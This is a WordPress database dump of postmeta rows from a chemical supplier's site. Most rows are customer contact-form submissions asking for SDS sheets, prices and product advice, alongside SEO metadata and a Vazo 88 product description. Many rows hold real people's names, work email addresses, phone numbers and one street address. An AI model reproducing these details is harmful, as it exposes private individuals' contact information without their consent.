INSERT INTO `wp_postmeta` VALUES (26783, 3110, '_field_12', 'Michael  Messersmith'); 
INSERT INTO `wp_postmeta` VALUES (26784, 3110, '_field_13', 'Keystone Turbine Services LLC'); 
INSERT INTO `wp_postmeta` VALUES (26785, 3110, '_field_18', 'We purchase from Industrial Supply, in Trevose,Pa.'); 
INSERT INTO `wp_postmeta` VALUES (26786, 3110, '_field_14', 'mmessersmith@kts-aero.com'); 
INSERT INTO `wp_postmeta` VALUES (26787, 3110, '_field_15', '(610) 268-6200'); 
INSERT INTO `wp_postmeta` VALUES (26788, 3110, '_field_16', 'Could I please get shelf life and certs for M-242N.  Batch# 3156\n\nI have a statement from 2013 that shows 5 years\nThanks!'); 
INSERT INTO `wp_postmeta` VALUES (26789, 3110, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26790, 3110, '_sub_id', '3110'); 
INSERT INTO `wp_postmeta` VALUES (26791, 3111, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26792, 3111, '_seq_num', '130'); 
INSERT INTO `wp_postmeta` VALUES (26793, 3111, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26794, 3111, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26795, 3111, '_field_1', 'Dan Schmid'); 
INSERT INTO `wp_postmeta` VALUES (26796, 3111, '_field_10', 'Fujifilm Sonosite'); 
INSERT INTO `wp_postmeta` VALUES (26797, 3111, '_field_2', 'daniel.schmid@sonosite.com'); 
INSERT INTO `wp_postmeta` VALUES (26798, 3111, '_field_8', '(425) 951-6945'); 
INSERT INTO `wp_postmeta` VALUES (26799, 3111, '_field_3', 'I would like to buy some MS-780 and 782 on a credit card.  How do I proceed?'); 
INSERT INTO `wp_postmeta` VALUES (26800, 3111, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26801, 3111, '_sub_id', '3111'); 
INSERT INTO `wp_postmeta` VALUES (26803, 1525, '_wp_old_slug', 'mold-release-agents'); 
INSERT INTO `wp_postmeta` VALUES (26804, 3113, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26805, 3113, '_seq_num', '145'); 
INSERT INTO `wp_postmeta` VALUES (26806, 3113, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26807, 3113, '_field_12', 'Glen Pericoli'); 
INSERT INTO `wp_postmeta` VALUES (26808, 3113, '_field_13', 'Ernie Ball Inc.'); 
INSERT INTO `wp_postmeta` VALUES (26809, 3113, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26810, 3113, '_field_14', 'glen@ernieball.com'); 
INSERT INTO `wp_postmeta` VALUES (26811, 3113, '_field_15', '(805) 544-7726'); 
INSERT INTO `wp_postmeta` VALUES (26812, 3113, '_field_16', 'Could you please provide an SDS for the following products:\r\n1) MS-143DF Release Agent/Dry Lubricant\r\n2) MS-122DF PTFE Release Agent/Dry Lubricant\r\nThank You.'); 
INSERT INTO `wp_postmeta` VALUES (26813, 3113, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26814, 3113, '_sub_id', '3113'); 
INSERT INTO `wp_postmeta` VALUES (26817, 302, '_yoast_wpseo_focuskw_text_input', 'PTFE Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (26818, 2312, '_wp_old_slug', 'ptfe-release-agents'); 
INSERT INTO `wp_postmeta` VALUES (26819, 2312, '_wp_old_slug', 'water-based-mold-release-agent-2'); 
INSERT INTO `wp_postmeta` VALUES (26820, 1681, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (26821, 1681, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26822, 1681, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (26823, 1681, '_yoast_wpseo_focuskw_text_input', 'PTFE Dry-Film Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (26824, 1681, '_yoast_wpseo_focuskw', 'PTFE Dry-Film Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (26825, 1681, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (26826, 1681, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-122XD","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (26827, 1681, '_yoast_wpseo_linkdex', '94'); 
INSERT INTO `wp_postmeta` VALUES (26828, 3116, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26829, 3116, '_seq_num', '146'); 
INSERT INTO `wp_postmeta` VALUES (26830, 3116, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26831, 3116, '_field_12', 'Mike Tranquilli'); 
INSERT INTO `wp_postmeta` VALUES (26832, 3116, '_field_13', 'Apple Rubber Products, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (26833, 3116, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26834, 3116, '_field_14', 'miket@applerubber.com'); 
INSERT INTO `wp_postmeta` VALUES (26835, 3116, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26836, 3116, '_field_16', 'Looking for a, non-silicone based, mold release recommendation for Fluorosilicone as well as liquid silicone rubber.   '); 
INSERT INTO `wp_postmeta` VALUES (26837, 3116, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26838, 3116, '_sub_id', '3116'); 
INSERT INTO `wp_postmeta` VALUES (26839, 3117, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26840, 3117, '_seq_num', '147'); 
INSERT INTO `wp_postmeta` VALUES (26841, 3117, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26842, 3117, '_field_12', 'Shanda Proulx'); 
INSERT INTO `wp_postmeta` VALUES (26843, 3117, '_field_13', 'Able Coil &amp; Electronics'); 
INSERT INTO `wp_postmeta` VALUES (26844, 3117, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26845, 3117, '_field_14', 'sproulx@ablecoil.com'); 
INSERT INTO `wp_postmeta` VALUES (26846, 3117, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26847, 3117, '_field_16', 'Please email me your SDS for MS-143E, quart\r\n\r\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (26848, 3117, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26849, 3117, '_sub_id', '3117'); 
INSERT INTO `wp_postmeta` VALUES (26855, 738, '_wp_old_slug', 'ms-472s'); 
INSERT INTO `wp_postmeta` VALUES (26856, 738, '_yoast_wpseo_focuskw_text_input', 'Polyurethane Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (26857, 738, '_yoast_wpseo_focuskw', 'Polyurethane Conformal Coatings'); 
INSERT INTO `wp_postmeta` VALUES (26858, 1149, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (26859, 1149, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26860, 1149, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (26861, 1149, '_yoast_wpseo_focuskw_text_input', 'MS-907 Two-Part Epoxy Adhesive'); 
INSERT INTO `wp_postmeta` VALUES (26862, 1149, '_yoast_wpseo_focuskw', 'MS-907 Two-Part Epoxy Adhesive'); 
INSERT INTO `wp_postmeta` VALUES (26863, 1149, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (26864, 1149, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (26865, 577, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (26866, 577, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (26867, 577, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (26868, 577, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (26869, 577, '_ywtm_content_tab_description', 'Vazo 88 radical initiator, also known as ACHN (1,1’-Azobis(cyanocyclohexane)), is an azo radical initiator source typically used as a polymerization initiator. Vazo 88 is used principally in higher temperature polymerizations with excellent solubilty in a wide variety of organic solvents. Vazo 88 will thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Benefits include:\r\n<ul>\r\n 	<li>Higher temperature activation</li>\r\n 	<li>Does not compete in costly sides reactions</li>\r\n 	<li>Head-to-Tail polymerization</li>\r\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\r\n 	<li>Can polymerize oxidation susceptible compound</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\r\n\r\nAll the grades are Vazo radical Initiators are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 88 radical initiator is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\r\n\r\nSolvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.\r\n<ul>\r\n 	<li>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</li>\r\n 	<li>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</li>\r\n 	<li>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</li>\r\n 	<li>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</li>\r\n 	<li>Are available in four grades to use over a wide temperature range.</li>\r\n</ul>\r\n<p class="largeText">Vazo™ free radical sources initiate the addition of compounds such as chlorine, hydrogen sulfide, thiols, and phosphines across double bonds. Vazo™ reacts with unsaturated compounds in equimolar amounts to give monomers and oligomers, which contain two Vazo™-derived groups. These dinitriles can be further converted to amides, amines, or acids. Vazo™ free radical sources initiate halogenations as well as the air oxidation of aromatic and aliphatic hydrocarbons, acrylonitrile, methyl methacrylate, and vinyl acetate. Vazo™ free radical sources release nitrogen gas when used, which can be used as a blowing agent.</p>\r\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]);'); 
INSERT INTO `wp_postmeta` VALUES (26870, 577, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (26877, 2694, '_wp_old_slug', 'troubleshooting-common-mold-release-issues'); 
INSERT INTO `wp_postmeta` VALUES (26879, 3125, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26880, 3125, '_seq_num', '131'); 
INSERT INTO `wp_postmeta` VALUES (26881, 3125, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26882, 3125, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26883, 3125, '_field_1', 'José Geraldo Romanelli'); 
INSERT INTO `wp_postmeta` VALUES (26884, 3125, '_field_10', 'Vitoria Química'); 
INSERT INTO `wp_postmeta` VALUES (26885, 3125, '_field_2', 'qualidade@vitoriaquimica.com.br'); 
INSERT INTO `wp_postmeta` VALUES (26886, 3125, '_field_8', '(193) 881-8955'); 
INSERT INTO `wp_postmeta` VALUES (26887, 3125, '_field_3', 'Where could I buy , here in Brazil,  the  Epoxy Adhesive MS-907.???\r\nI want to use it in a pull-off adhesion assay.\r\n\r\nThank you very much.\r\n\r\nJosé Geraldo'); 
INSERT INTO `wp_postmeta` VALUES (26888, 3125, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26889, 3125, '_sub_id', '3125'); 
INSERT INTO `wp_postmeta` VALUES (26890, 3126, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26891, 3126, '_seq_num', '132'); 
INSERT INTO `wp_postmeta` VALUES (26892, 3126, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26893, 3126, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26894, 3126, '_field_1', 'Antonio Eduardo Durao Guerreiro'); 
INSERT INTO `wp_postmeta` VALUES (26895, 3126, '_field_10', 'AgustaWestland (Leonardo Helicopters)'); 
INSERT INTO `wp_postmeta` VALUES (26896, 3126, '_field_2', 'eduardo.guerreiro@leonardocompany.com'); 
INSERT INTO `wp_postmeta` VALUES (26897, 3126, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (26898, 3126, '_field_3', 'Hi,\r\ni am looking for a product that MS use to sell, called MS-160. Is this discontinued? if yes, do you have  a replacement?\r\nKind regards\r\nEduardo'); 
INSERT INTO `wp_postmeta` VALUES (26899, 3126, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26900, 3126, '_sub_id', '3126'); 
INSERT INTO `wp_postmeta` VALUES (26903, 1149, '_yoast_wpseo_linkdex', '76'); 
INSERT INTO `wp_postmeta` VALUES (26904, 3130, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26905, 3130, '_seq_num', '133'); 
INSERT INTO `wp_postmeta` VALUES (26906, 3130, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26907, 3130, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26908, 3130, '_field_1', 'Philipp Sick'); 
INSERT INTO `wp_postmeta` VALUES (26909, 3130, '_field_10', 'Rice University'); 
INSERT INTO `wp_postmeta` VALUES (26910, 3130, '_field_2', 'ps24@rice.edu'); 
INSERT INTO `wp_postmeta` VALUES (26911, 3130, '_field_8', '(734) 353-2912'); 
INSERT INTO `wp_postmeta` VALUES (26912, 3130, '_field_3', 'Hello,\r\n\r\nMy name is Philipp Sick and I am a senior at Rice University, where I study chemical engineering. I was wondering if Miller-Stephenson had any open positions for entry-level chemical engineers, and if so, where to apply?\r\n\r\nThanks,\r\nPhilipp Sick'); 
INSERT INTO `wp_postmeta` VALUES (26913, 3130, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26914, 3130, '_sub_id', '3130'); 
INSERT INTO `wp_postmeta` VALUES (26915, 3131, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26916, 3131, '_seq_num', '134'); 
INSERT INTO `wp_postmeta` VALUES (26917, 3131, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26918, 3131, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26919, 3131, '_field_1', 'Joseph Rony'); 
INSERT INTO `wp_postmeta` VALUES (26920, 3131, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (26921, 3131, '_field_2', 'jospeh.rony@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (26922, 3131, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (26923, 3131, '_field_3', 'Hi,\r\n\r\nWe can fairly quickly promote your website to the top of the search rankings with no long term contracts!\r\n\r\nWe can place your website on top of the Natural Listings on Google, Yahoo and MSN. Our Search Engine Optimization team delivers more top rankings then anyone else and we can prove it. We do not use &quot;link farms&quot; or &quot;black hat&quot; methods that Google and the other search engines frown upon and can use to de-list or ban your site. The techniques are proprietary, involving some valuable closely held trade secrets. Our prices are less then half of what other companies charge.\r\n\r\nWe would be happy to send you a proposal using the top search phrases for your area of expertise. Please contact me at your convenience so we can start saving you some money.\r\n\r\nIn order for us to respond to your request for information, please include your Name, company’s website address (mandatory) and /or phone number.\r\n\r\nSincerely,\r\nJoseph\r\njospeh.rony@gmail.com\r\n\r\nCOMPLETE INTERNET MARKETING SOLUTION\r\nSEO - PPC - SMO - Link Building - Copyright - Web Designing - PHP'); 
INSERT INTO `wp_postmeta` VALUES (26924, 3131, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26925, 3131, '_sub_id', '3131'); 
INSERT INTO `wp_postmeta` VALUES (26926, 1338, '_wp_old_slug', 'plastic-glass-metal-cleaner'); 
INSERT INTO `wp_postmeta` VALUES (26927, 3134, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26928, 3134, '_seq_num', '135'); 
INSERT INTO `wp_postmeta` VALUES (26929, 3134, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26930, 3134, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26931, 3134, '_field_1', 'Dennis Boehmer'); 
INSERT INTO `wp_postmeta` VALUES (26932, 3134, '_field_10', 'PolyPro   llc'); 
INSERT INTO `wp_postmeta` VALUES (26933, 3134, '_field_2', 'dbimmer@ameritech.net'); 
INSERT INTO `wp_postmeta` VALUES (26934, 3134, '_field_8', '(937) 426-0754'); 
INSERT INTO `wp_postmeta` VALUES (26935, 3134, '_field_3', 'Hello,\n  I have an 8oz. tube of Krytox  GPL-265 from a project of many years\nago. Could you please advise the specs for this grease?  I need an extreme pressure grease with moly for the lubrication of splines in\ndrive  systems.  Any advise will be appreciated...'); 
INSERT INTO `wp_postmeta` VALUES (26936, 3134, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26937, 3134, '_sub_id', '3134'); 
INSERT INTO `wp_postmeta` VALUES (26941, 2694, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (26946, 2694, '_wp_old_slug', 'troubleshooting-common-molding-issues'); 
INSERT INTO `wp_postmeta` VALUES (26953, 3142, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26954, 3142, '_seq_num', '136'); 
INSERT INTO `wp_postmeta` VALUES (26955, 3142, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26956, 3142, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26957, 3142, '_field_1', 'TAMER GÜNDOĞMUŞ'); 
INSERT INTO `wp_postmeta` VALUES (26958, 3142, '_field_10', 'THK Technics'); 
INSERT INTO `wp_postmeta` VALUES (26959, 3142, '_field_2', 'tamer.gundogmus@thkteknik.com'); 
INSERT INTO `wp_postmeta` VALUES (26960, 3142, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (26961, 3142, '_field_3', 'Hello,\r\nWe have MS-122XD  but we need MS-122AD .\r\nwe may use MS-122XD  instead of MS-122AD.\r\nIf you say ok please send us alternate usage documents\r\nthank you'); 
INSERT INTO `wp_postmeta` VALUES (26962, 3142, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26963, 3142, '_sub_id', '3142'); 
INSERT INTO `wp_postmeta` VALUES (26964, 3143, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26965, 3143, '_seq_num', '148'); 
INSERT INTO `wp_postmeta` VALUES (26966, 3143, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26967, 3143, '_field_12', 'Andrea Rodrigues'); 
INSERT INTO `wp_postmeta` VALUES (26968, 3143, '_field_13', 'RUAG Aviation Ag'); 
INSERT INTO `wp_postmeta` VALUES (26969, 3143, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26970, 3143, '_field_14', 'andrea.rodrigues@ruag.com'); 
INSERT INTO `wp_postmeta` VALUES (26971, 3143, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26972, 3143, '_field_16', 'Hi,\n\nCould you send me the latest European MSDS from product MS-530N/532N Contact Re-Nu in German, English and French?\n\nthank you for your help.\nBest regards\nAndrea Rodrigues'); 
INSERT INTO `wp_postmeta` VALUES (26973, 3143, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26974, 3143, '_sub_id', '3143'); 
INSERT INTO `wp_postmeta` VALUES (26975, 3144, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26976, 3144, '_seq_num', '149'); 
INSERT INTO `wp_postmeta` VALUES (26977, 3144, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26978, 3144, '_field_12', 'Udai Padmanabhan'); 
INSERT INTO `wp_postmeta` VALUES (26979, 3144, '_field_13', 'Stratnel Technologies'); 
INSERT INTO `wp_postmeta` VALUES (26980, 3144, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26981, 3144, '_field_14', 'udai@stratnel.com'); 
INSERT INTO `wp_postmeta` VALUES (26982, 3144, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26983, 3144, '_field_16', 'We are experimenting with an aluminium filled epoxy casting resin. We want to cast this within a 3D printed ABS mold housing. What kind releasing agent would you suggest for this application? We have already tried Silicone based releasing agent with very disappointing results. '); 
INSERT INTO `wp_postmeta` VALUES (26984, 3144, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26985, 3144, '_sub_id', '3144'); 
INSERT INTO `wp_postmeta` VALUES (26986, 3145, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26987, 3145, '_seq_num', '150'); 
INSERT INTO `wp_postmeta` VALUES (26988, 3145, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26989, 3145, '_field_12', 'Joshua Holt'); 
INSERT INTO `wp_postmeta` VALUES (26990, 3145, '_field_13', 'Simonds International'); 
INSERT INTO `wp_postmeta` VALUES (26991, 3145, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26992, 3145, '_field_14', 'jholt@simondsint.com'); 
INSERT INTO `wp_postmeta` VALUES (26993, 3145, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26994, 3145, '_field_16', 'Hello,\r\nMy name is Joshua Holt. I work for Simonds International in our Big Rapids, Michigan plant. We are updating our msds sheets and I have come across a product of yours and cannot seem to find it. The trade name of the product I am looking for is MS-260 Safezone Cleaner for Plastic, Glass &amp; Metal. Any Help in getting the most up to date msds would be greatly appreciated. \r\nThank You!\r\n\r\nSincerely,\r\nJoshua Holt\r\n'); 
INSERT INTO `wp_postmeta` VALUES (26995, 3145, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26996, 3145, '_sub_id', '3145'); 
INSERT INTO `wp_postmeta` VALUES (26997, 3146, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26998, 3146, '_seq_num', '151'); 
INSERT INTO `wp_postmeta` VALUES (26999, 3146, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27000, 3146, '_field_12', 'Eugene Fuller'); 
INSERT INTO `wp_postmeta` VALUES (27001, 3146, '_field_13', 'Pratt &amp; Whitney, UTC'); 
INSERT INTO `wp_postmeta` VALUES (27002, 3146, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27003, 3146, '_field_14', 'eugene.fuller@pw.utc.com'); 
INSERT INTO `wp_postmeta` VALUES (27004, 3146, '_field_15', '(860) 343-2473'); 
INSERT INTO `wp_postmeta` VALUES (27005, 3146, '_field_16', 'Can you please provide a SDS for Epoxy 907 Adhesive System (NSN 8040-00-144-9729)'); 
INSERT INTO `wp_postmeta` VALUES (27006, 3146, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27007, 3146, '_sub_id', '3146'); 
INSERT INTO `wp_postmeta` VALUES (27008, 3147, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27009, 3147, '_seq_num', '152'); 
INSERT INTO `wp_postmeta` VALUES (27010, 3147, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27011, 3147, '_field_12', 'David Goldenberg'); 
INSERT INTO `wp_postmeta` VALUES (27012, 3147, '_field_13', 'Globecast Americas'); 
INSERT INTO `wp_postmeta` VALUES (27013, 3147, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27014, 3147, '_field_14', 'david.goldenberg@globecast.com'); 
INSERT INTO `wp_postmeta` VALUES (27015, 3147, '_field_15', '(425) 737-6346'); 
INSERT INTO `wp_postmeta` VALUES (27016, 3147, '_field_16', 'Please email me a sds for MS-180 TF  Solvent\r\nI have the old 1991 version and I need the newer OSHA mandated,\r\nupdated SDS version. CAS #&#039;S 76-13-1  &amp;  75-71-8.\r\nThank You.\r\ndavid.goldenberg@globecast.com'); 
INSERT INTO `wp_postmeta` VALUES (27017, 3147, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27018, 3147, '_sub_id', '3147'); 
INSERT INTO `wp_postmeta` VALUES (27019, 3089, '_yoast_wpseo_metadesc', 'Conformal Coating Defects and Repairs'); 
INSERT INTO `wp_postmeta` VALUES (27020, 1664, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (27021, 1664, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27022, 1662, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (27023, 1662, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27024, 1666, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (27025, 1666, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27026, 3149, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27027, 3149, '_seq_num', '153'); 
INSERT INTO `wp_postmeta` VALUES (27028, 3149, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27029, 3149, '_field_12', 'Darin McCoy'); 
INSERT INTO `wp_postmeta` VALUES (27030, 3149, '_field_13', 'L-3 Communications'); 
INSERT INTO `wp_postmeta` VALUES (27031, 3149, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27032, 3149, '_field_14', 'darin.mccoy@l-3com.com'); 
INSERT INTO `wp_postmeta` VALUES (27033, 3149, '_field_15', '(817) 782-6422'); 
INSERT INTO `wp_postmeta` VALUES (27034, 3149, '_field_16', 'request a current copy of MS-122XD SDS'); 
INSERT INTO `wp_postmeta` VALUES (27035, 3149, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27036, 3149, '_sub_id', '3149'); 
INSERT INTO `wp_postmeta` VALUES (27037, 3150, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27038, 3150, '_seq_num', '154'); 
INSERT INTO `wp_postmeta` VALUES (27039, 3150, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27040, 3150, '_field_12', 'Kento Haruna'); 
INSERT INTO `wp_postmeta` VALUES (27041, 3150, '_field_13', 'Japan'); 
INSERT INTO `wp_postmeta` VALUES (27042, 3150, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27043, 3150, '_field_14', '4516641@ed.tus.ac.jp'); 
INSERT INTO `wp_postmeta` VALUES (27044, 3150, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27045, 3150, '_field_16', 'Nice to meet you.\r\nI&#039;m a master degree student of Tokyo University of Science majoring in mechanical engineering.\r\n\r\nI want to hear from you about informations about hexion&#039;s products.\r\nI&#039;d like to buy EPON828, EPON8132, EPIKURE3230, EPIKURE3046.\r\n\r\nThen, I want to know about delivery date of them.\r\nWould you tell me about those product&#039;s delivery date for our office?\r\nThe location of our office is &quot;6-3-1, Niijuku, Katsushikaku, Tokyo, Japan&quot;\r\n\r\nI&#039;ll be glad if you would let me know about the informartion as soon as possible.'); 
INSERT INTO `wp_postmeta` VALUES (27046, 3150, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27047, 3150, '_sub_id', '3150'); 
INSERT INTO `wp_postmeta` VALUES (27048, 3151, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27049, 3151, '_seq_num', '155'); 
INSERT INTO `wp_postmeta` VALUES (27050, 3151, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27051, 3151, '_field_12', 'Kento Haruna'); 
INSERT INTO `wp_postmeta` VALUES (27052, 3151, '_field_13', 'Tokyo University of Science'); 
INSERT INTO `wp_postmeta` VALUES (27053, 3151, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27054, 3151, '_field_14', '4516641@ed.tus.ac.jp'); 
INSERT INTO `wp_postmeta` VALUES (27055, 3151, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27056, 3151, '_field_16', 'Nice to meet you.\r\n\r\nI&#039;m a master degree student of Tokyo University of Science majoring in mechanical engineering.\r\nA few minutes ago in order to know about the information of EPON828, EPON8132, EPIKURE3230, EPIKURE3046, I sent a message to you.\r\n\r\nI said, &quot;I want to know about the delivery date of those products&quot;.\r\nBut also, I want to know about the price of each product.\r\n\r\nI&#039;m sorry to take your time.'); 
INSERT INTO `wp_postmeta` VALUES (27057, 3151, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27058, 3151, '_sub_id', '3151'); 
INSERT INTO `wp_postmeta` VALUES (27059, 3152, '_edit_lock', '1480426593:2'); 
INSERT INTO `wp_postmeta` VALUES (27060, 3152, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (27061, 3153, '_wp_attached_file', '2016/11/xht.jpg'); 
